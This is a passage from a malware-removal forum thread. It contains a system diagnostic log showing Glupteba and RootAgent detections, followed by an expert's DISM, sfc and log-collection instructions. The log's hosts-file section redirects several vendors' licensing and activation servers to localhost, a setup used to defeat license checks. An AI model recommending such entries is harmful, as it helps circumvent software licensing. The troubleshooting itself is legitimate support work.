2009-02-23 12:16 - 2009-02-23 12:16 - 000067584 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDPROXY.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000061952 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctpcmcia.DLL
2009-02-23 12:28 - 2009-02-23 12:28 - 000046592 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctspkhlp.DLL
2016-12-07 20:44 - 2016-12-07 20:44 - 000373248 _____ (IntelleSoft) [File not signed] C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\BugTrapU-x64.dll
2017-09-29 00:39 - 2017-09-29 00:39 - 000252928 _____ (Microsoft Corporation) [File not signed] C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbPc.DLL
2019-02-18 21:23 - 2019-10-26 22:44 - 000281600 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVFILESYSTEMMETADATA.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000400896 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvApi.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001124864 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvSubsystemController.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000519680 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvVirtualization.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000836608 _____ (Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVOrchestration.dll
2019-02-18 21:23 - 2019-02-18 21:23 - 000000000 ____L (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Root\Office16\AppVIsvSubsystems32.dll
2019-02-18 21:23 - 2019-02-18 21:23 - 000000000 ____L (Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Root\Office16\c2r32.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000585008 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVCatalog.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001642800 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIntegration.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 000177968 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\AppVIsvStreamingManager.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001010992 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVMANIFEST.dll
2019-02-18 21:23 - 2019-10-26 22:44 - 001091888 _____ (Microsoft Windows -> Microsoft Corporation) [File not signed] C:\Program Files\Common Files\Microsoft Shared\ClickToRun\APPVPOLICY.dll
2017-05-26 12:29 - 2017-05-26 12:29 - 000116224 _____ (pdfforge GmbH) [File not signed] C:\Windows\System32\pdfcmon.dll

==================== Alternate Data Streams (Whitelisted) ========

==================== Safe Mode (Whitelisted) ==================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) =================

==================== Internet Explorer trusted/restricted ==========

==================== Hosts content: =========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2015-07-10 13:04 - 2019-06-18 13:33 - 000001666 ____R C:\Windows\system32\drivers\etc\hosts
127.0.0.1 precisionmanuals.com
127.0.0.1 www.precisionmanuals.com
127.0.0.1 license.precisionmanuals.com
127.0.0.1                   auth.cycling74.com
127.0.0.1                   auth64.cycling74.com
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com
127.0.0.1       65.52.240.48
127.0.0.1       oscount.techsmith.com
127.0.0.1       69.167.144.18
127.0.0.1    www.techsmith.com
127.0.0.1    activation.cloud.techsmith.com
127.0.0.1    oscount.techsmith.com
127.0.0.1    updater.techsmith.com
127.0.0.1    camtasiatudi.techsmith.com
127.0.0.1    tsccloud.cloudapp.net
127.0.0.1    assets.cloud.techsmith.com

==================== Other Areas ===========================

(Currently there is no automatic fix for this section.)

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> D:\Program Files (x86)\Embarcadero\Studio\19.0\bin;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl;D:\Program Files (x86)\Embarcadero\Studio\19.0\bin64;C:\Users\Public\Documents\Embarcadero\Studio\19.0\Bpl\Win64;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static;C:\Program Files\Microsoft SQL Server\110\Tools\Binn\;C:\Program Files (x86)\GtkSharp\2.12\bin;C:\Program Files (x86)\NVIDIA Corporation\PhysX\Common;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files (x86)\QuickTime\QTSystem\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\dotnet\
HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-11262019134949250\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\Windows\img0.jpg
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 1.1.1.1 - 1.0.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(If an entry is included in the fixlist, it will be removed.)

HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "Greenshot"
HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run32: => "StartCCC"
HKLM\...\StartupApproved\Run32: => "AsioThk32Reg"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\StartupApproved\Run: => "Viber"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{91AC375A-B6EC-4001-802D-B72C16747E11}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [UDP Query User{A6F1920D-D88E-48EB-B0AB-6804B6D1752E}C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe] => (Allow) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{93EDDD15-9B7C-4447-ABAE-501201FF8A61}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [{C3DDABFC-FE5E-4CC3-9C79-344AB623C7DB}] => (Block) C:\programdata\logishrd\logioptions\software\current\logioptionsmgr.exe (Logitech Inc -> Logitech, Inc.)
FirewallRules: [TCP Query User{BF23CCF8-3722-4E94-BBCD-048D218B58ED}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [UDP Query User{CCB1BECF-8668-4A0A-81EA-7482FB3A4DE8}D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe] => (Allow) D:\dovetail games - flight\microsoft flight simulator x steam edition\fsx.exe (RailSimulator T/A Dovetail -> Microsoft Corp.)
FirewallRules: [{F0D42ECE-AF71-4409-A450-E3F863137671}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{5EBA522B-A804-426C-839D-4449D306556A}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation)
FirewallRules: [{23C98884-7855-4B47-9DCE-7656330C8DFC}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{5D8EC213-3D1D-4722-956F-E0A2CC9E212B}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [TCP Query User{021D1265-3A31-43D0-9520-4E7D81972374}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [UDP Query User{C66DEFFE-A5F1-4B7E-A74E-F9368D6D6EC0}C:\program files\cycling '74\max 7\max.exe] => (Allow) C:\program files\cycling '74\max 7\max.exe (Cycling '74) [File not signed]
FirewallRules: [{A8361D34-69CE-446C-9567-9A0EFC8AF75A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F3D527C7-4F10-47C7-ABC4-820BCD31768B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{486EB322-4CC3-4726-8F83-95DCE3A309AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{F7124E26-2B62-49EC-8E6B-F2B5F4288ECC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{287425B3-761D-4793-BD0B-39346EA97794}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{629429D6-E5F3-4D9E-87A1-668E6E2578AF}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation)
FirewallRules: [{09C709D6-BEC4-4FE0-8569-D32BE72EBB20}] => (Allow) LPort=8318
FirewallRules: [{97B5B393-FE3F-4B8E-8BA8-A8FDEE7DF18F}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{F13A0E2B-3CE0-497A-A237-A2034F33A8E6}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe () [File not signed]
FirewallRules: [{39B466A5-4C25-4C27-90D2-6CA05D4A0AF4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{DD68D091-C860-4103-B578-87949E0C39C5}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{3FA6B652-D2F9-43D5-8487-2643470B90D9}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{65D7C44B-7B22-436F-81D1-83ED80E67633}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer GmbH -> TeamViewer GmbH)
FirewallRules: [{B74858EF-98FA-4A92-81DC-4F17DCAB4DEA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc -> Dropbox, Inc.)
FirewallRules: [TCP Query User{D17DCF5C-B1C8-4216-9754-89508AAA6F02}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]
FirewallRules: [UDP Query User{59A3E512-E9CB-419C-AB1B-2B0EF51A5B9C}C:\program files\native instruments\native access\addlibrary.exe] => (Allow) C:\program files\native instruments\native access\addlibrary.exe () [File not signed]

==================== Restore Points =========================

19-11-2019 13:12:33 Scheduled Checkpoint
26-11-2019 13:38:10 Malwarebytes Anti-Rootkit Restore Point

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (11/26/2019 01:50:28 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 01:49:59 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 01:40:02 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 01:39:32 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 01:38:51 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: reaper_host32.exe, version: 0.0.0.0, time stamp: 0x5dd47f93
Faulting module name: QuickTime.qts, version: 7.79.80.95, time stamp: 0x5668a2c5
Exception code: 0xc0000005
Fault offset: 0x0001aed4
Faulting process id: 0x3f60
Faulting application start time: 0x01d5a43fe7d74f43
Faulting application path: C:\Program Files\REAPER (x64)\Plugins\reaper_host32.exe
Faulting module path: C:\Program Files (x86)\QuickTime\QTSystem\QuickTime.qts
Report Id: 4fe66871-8230-48aa-ab8d-ff6dcf8419f1
Faulting package full name:
Faulting package-relative application ID:

Error: (11/26/2019 12:49:35 PM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 09:38:59 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.

Error: (11/26/2019 09:38:29 AM) (Source: SideBySide) (EventID: 78) (User: )
Description: Activation context generation failed for "C:\Global Prime - MetaTrader 4\terminal.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_fb429a5930656358.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.345_none_42efd13044e18c5e.manifest.


System errors:
=============
Error: (11/26/2019 01:51:48 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscDataProtection
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/26/2019 01:51:48 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/26/2019 01:41:22 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscDataProtection
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/26/2019 01:41:22 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID
Windows.SecurityCenter.WscBrokerManager
 and APPID
Unavailable
 to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Error: (11/26/2019 01:38:55 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (11/26/2019 01:38:55 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (11/26/2019 01:38:55 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Error: (11/25/2019 11:47:47 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-A0OS1Q6)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.


Windows Defender:
===================================
Date: 2019-11-26 13:36:18.582
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...07&enterprise=0
Name: Trojan:Win64/RootAgent
ID: 2147727907
Severity: Severe
Category: Trojan
Path: file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonProcessMonitor.sys-k.mbam; file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonProcessMonitor.sys-u.mbam
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\SR\Desktop\mbar\mbar.exe
Signature Version: AV: 1.305.2798.0, AS: 1.305.2798.0, NIS: 1.305.2798.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-26 13:36:18.561
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...07&enterprise=0
Name: Trojan:Win64/RootAgent
ID: 2147727907
Severity: Severe
Category: Trojan
Path: file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonProcessMonitor.sys-k.mbam
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\SR\Desktop\mbar\mbar.exe
Signature Version: AV: 1.305.2798.0, AS: 1.305.2798.0, NIS: 1.305.2798.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-26 13:23:25.151
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...53&enterprise=0
Name: VirTool:Win64/Glupteba.B
ID: 2147730753
Severity: Severe
Category: Tool
Path: file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonFS.sys-k.mbam; file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonFS.sys-u.mbam
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\SR\Desktop\mbar\mbar.exe
Signature Version: AV: 1.305.2798.0, AS: 1.305.2798.0, NIS: 1.305.2798.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-26 13:23:25.140
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...53&enterprise=0
Name: VirTool:Win64/Glupteba.B
ID: 2147730753
Severity: Severe
Category: Tool
Path: file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\WinmonFS.sys-k.mbam
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\SR\Desktop\mbar\mbar.exe
Signature Version: AV: 1.305.2798.0, AS: 1.305.2798.0, NIS: 1.305.2798.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

Date: 2019-11-26 13:23:20.632
Description:
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
https://go.microsoft...52&enterprise=0
Name: VirTool:Win64/Glupteba.A
ID: 2147730752
Severity: Severe
Category: Tool
Path: file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\Winmon.sys-k.mbam; file:_C:\ProgramData\Malwarebytes' Anti-Malware (portable)\Winmon.sys-u.mbam
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Users\SR\Desktop\mbar\mbar.exe
Signature Version: AV: 1.305.2798.0, AS: 1.305.2798.0, NIS: 1.305.2798.0
Engine Version: AM: 1.1.16500.1, NIS: 1.1.16500.1

CodeIntegrity:
===================================

Date: 2019-11-26 13:44:03.413
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-11-26 13:44:03.409
Description:
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2019-11-25 01:38:49.794
Description:
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\drivers\Winmon.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

BIOS: American Megatrends Inc. F9 10/23/2013
Motherboard: Gigabyte Technology Co., Ltd. B75-D3V
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 19%
Total physical RAM: 16331.55 MB
Available physical RAM: 13137.85 MB
Total Virtual: 16631.55 MB
Available Virtual: 12049.41 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:231.78 GB) (Free:63.61 GB) NTFS
Drive d: (New BU) (Fixed) (Total:931.39 GB) (Free:158.11 GB) NTFS
Drive e: (New Volume) (Fixed) (Total:931.51 GB) (Free:64.95 GB) NTFS
Drive f: (BU) (Fixed) (Total:1863.01 GB) (Free:214.56 GB) NTFS

\\?\Volume{00fc4e36-48f8-4543-8741-951af844353c}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{0f7535bc-bb12-4bb5-9367-1087afe3ce64}\ () (Fixed) (Total:0 GB) (Free:0 GB)
\\?\Volume{d3c45f89-7398-47bf-8292-fa43e6189f5c}\ () (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 232.9 GB) (Disk ID: 1F5C5EF9)

Partition: GPT.

==========================================================
Disk: 1 (Protective MBR) (Size: 931.5 GB) (Disk ID: 00000000)

Partition: GPT.

==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 0B480A61)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 1863 GB) (Disk ID: 00738CFB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================


  • 0

#9
spra

spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

During a second (last)  check, mbar did not find anything.
It says that I am clear.
Do you think there are more steps I should take?


  • 0

#10
RKinner

RKinner

    Malware Expert

  • Expert
  • 22,034 posts
  • MVP

Let's run dism and sfc to check that your system files are healthy:

 

Open an elevated command prompt:

http://www.howtogeek...-in-windows-10/

(If you open an elevated Command Prompt properly it will say Administrator: Command Prompt in the margin at the top of the window)


Once you have an elevated command prompt:

Type:

 DISM  /Online  /Cleanup-Image  /RestoreHealth


 (I use two spaces so you can be sure to see where one space goes.)
Hit Enter.  This will take a while (10-20 minutes) to complete.  Once the prompt returns:

Reboot.  Open an elevated Command Prompt again and type (with an Enter after the line):

sfc  /scannow




This will also take a few minutes.  

When it finishes it will say one of the following:

Windows did not find any integrity violations (a good thing)
Windows Resource Protection found corrupt files and repaired them (a good thing)
Windows Resource Protection found corrupt files but was unable to fix some (or all) of them (not a good thing)

If you get the last result then type:

findstr  /c:"[SR]"  \windows\logs\cbs\cbs.log  >  %UserProfile%\desktop\junk.txt


Hit Enter.  Then type::
 

notepad %UserProfile%\desktop\junk.txt


Hit Enter.

 Copy the text from notepad and paste it into a reply.


After you finish SFC, regardless of the result:



1. Please download the Event Viewer Tool by Vino Rosso
http://images.malwar...om/vino/VEW.exe
and save it to your Desktop:
2. Right-click VEW.exe and Run AS Administrator
3. Under 'Select log to query', select:

* System
4. Under 'Select type to list', select:
* Error
* Warning


Then use the 'Number of events' as follows:


1. Click the radio button for 'Number of events'
Type 20 in the 1 to 20 box
Then click the Run button.
Notepad will open with the output log.


Please post the Output log in your next reply then repeat but select Application.  (Each time you run VEW it overwrites the log so copy the first one to a Reply or rename it before running it a second time.)
 


  • 0

Advertisements


#11
spra

spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

Before I proceed you should know that DISM stopped at 90.1% with error 1060.
I tried to copy the log's content here but it seems like it freezing it.

As you have not mentioned what I should do in such a case, I conclude that regardless, you are expecting me to continue with the next steps.
So that is what I am going to do.


  • 0

#12
spra

spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

sfc found problems that could not repair. The log is below. Now I will take the next steps.

 

2019-11-16 11:53:22, Info                  CSI    00000006 [SR] Verifying 1 components
2019-11-16 11:53:22, Info                  CSI    00000007 [SR] Beginning Verify and Repair transaction
2019-11-16 11:53:22, Info                  CSI    00000009 [SR] Verify complete
2019-11-16 11:53:22, Info                  CSI    0000000a [SR] Verifying 1 components
2019-11-16 11:53:22, Info                  CSI    0000000b [SR] Beginning Verify and Repair transaction
2019-11-16 11:53:22, Info                  CSI    0000000d [SR] Verify complete
2019-11-16 11:53:22, Info                  CSI    0000000e [SR] Verifying 1 components
2019-11-16 11:53:22, Info                  CSI    0000000f [SR] Beginning Verify and Repair transaction
2019-11-16 11:53:22, Info                  CSI    00000011 [SR] Verify complete
2019-11-16 11:53:22, Info                  CSI    00000012 [SR] Verifying 1 components
2019-11-16 11:53:22, Info                  CSI    00000013 [SR] Beginning Verify and Repair transaction
2019-11-16 11:53:22, Info                  CSI    00000015 [SR] Verify complete
